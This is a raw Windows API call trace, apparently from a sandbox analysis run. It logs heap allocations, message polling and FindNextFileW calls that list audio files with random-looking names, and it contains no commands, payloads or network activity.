[0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35a8 | out: hHeap=0x25c0000) returned 1 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.569] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.569] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.570] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35a8 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130) returned 0x24b2e00 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35a8 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.571] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.571] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.571] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da723d0, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xb43d00b0, ftLastAccessTime.dwHighDateTime=0x1d4d525, ftLastWriteTime.dwLowDateTime=0xb43d00b0, ftLastWriteTime.dwHighDateTime=0x1d4d525, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x24a9708, dwReserved1=0x25c6e50, cFileName="QeeT.m4a", cAlternateFileName="")) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.572] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.572] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.573] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.573] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.573] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.573] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4826d0, ftCreationTime.dwHighDateTime=0x1d4ce8a, ftLastAccessTime.dwLowDateTime=0x8ab44d10, ftLastAccessTime.dwHighDateTime=0x1d4c612, ftLastWriteTime.dwLowDateTime=0x8ab44d10, ftLastWriteTime.dwHighDateTime=0x1d4c612, nFileSizeHigh=0x0, nFileSizeLow=0xafeb, dwReserved0=0x24aa8c0, dwReserved1=0x25c6e50, cFileName="qjSu2Nf.wav", cAlternateFileName="")) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.574] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.574] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.574] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.575] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.575] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.575] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa18e10, ftCreationTime.dwHighDateTime=0x1d4cab5, ftLastAccessTime.dwLowDateTime=0xcece11b0, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0xcece11b0, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x14980, dwReserved0=0x24aaec0, dwReserved1=0x25c6e50, cFileName="Rk60-o366.m4a", cAlternateFileName="RK60-O~1.M4A")) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.576] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.576] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.576] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.577] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.577] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.577] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bd51140, ftCreationTime.dwHighDateTime=0x1d4cd15, ftLastAccessTime.dwLowDateTime=0x473185e0, ftLastAccessTime.dwHighDateTime=0x1d4d061, ftLastWriteTime.dwLowDateTime=0x473185e0, ftLastWriteTime.dwHighDateTime=0x1d4d061, nFileSizeHigh=0x0, nFileSizeLow=0xc6c8, dwReserved0=0x24a9708, dwReserved1=0x25c6e50, cFileName="SI3T x_6.mp3", cAlternateFileName="SI3TX_~1.MP3")) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.578] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.578] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.578] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.579] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 